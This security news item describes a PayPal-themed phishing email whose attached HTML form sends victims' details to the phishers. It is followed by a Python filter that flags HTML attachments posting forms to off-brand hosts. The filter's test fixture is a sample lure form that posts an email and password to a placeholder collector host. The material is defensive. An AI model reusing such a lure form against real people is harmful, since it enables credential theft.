With "You have changed your PayPal email address" in the subject line, the sender attempts to convince the recipients that someone has accessed their account and changed the email address associated with it. To "keep the original email and restore their PayPal account", the users are required to fill out the attached Personal Profile Form - PayPal-.htm form.
Unfortunately for those who fall for this scam, the submitted information gets sent directly to the phishers, points out Sophos.
As always, users are advised to ignore emails such as these - or better yet, forward them to the company's security team - and to check whether anything is amiss by typing the URL of PayPal's legitimate site directly into their browsers.
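A mail-filter check for the lure described above, as an added example that is not from Sophos or the original article: it flags .htm/.html attachments whose forms submit to a host outside PayPal's own domain. The sample message, the example.test hosts and the trusted-suffix list are constructed assumptions.

```python
from email import message_from_string
from html.parser import HTMLParser
from urllib.parse import urlparse

TRUSTED_SUFFIXES = ("paypal.com",)  # assumption: the brand's own domain

# Constructed sample message; hosts under example.test are placeholders.
SAMPLE = """\
Subject: You have changed your PayPal email address
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html
Content-Disposition: attachment; filename="Personal Profile Form - PayPal-.htm"

<form method="post" action="http://collector.example.test/save.php">
<input name="email"><input type="password" name="pw"></form>
--b1--
"""

class FormActions(HTMLParser):
    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.actions.append(dict(attrs).get("action") or "")

def is_trusted(host):
    # Exact match or true subdomain only, so "paypal.com.evil.test" fails.
    host = (host or "").lower().rstrip(".")
    return any(host == s or host.endswith("." + s) for s in TRUSTED_SUFFIXES)

def scan_message(raw):
    """Return (attachment name, form host) for forms posting off-brand."""
    findings = []
    for part in message_from_string(raw).walk():
        name = part.get_filename() or ""
        if not name.lower().endswith((".htm", ".html")):
            continue
        parser = FormActions()
        parser.feed(part.get_payload(decode=True).decode("utf-8", "replace"))
        for action in parser.actions:
            host = urlparse(action).hostname  # None for relative actions
            if host and not is_trusted(host):
                findings.append((name, host))
    return findings
```

Calling `scan_message(SAMPLE)` returns the attachment name paired with the off-brand host; a message whose form posts to a PayPal subdomain returns an empty list.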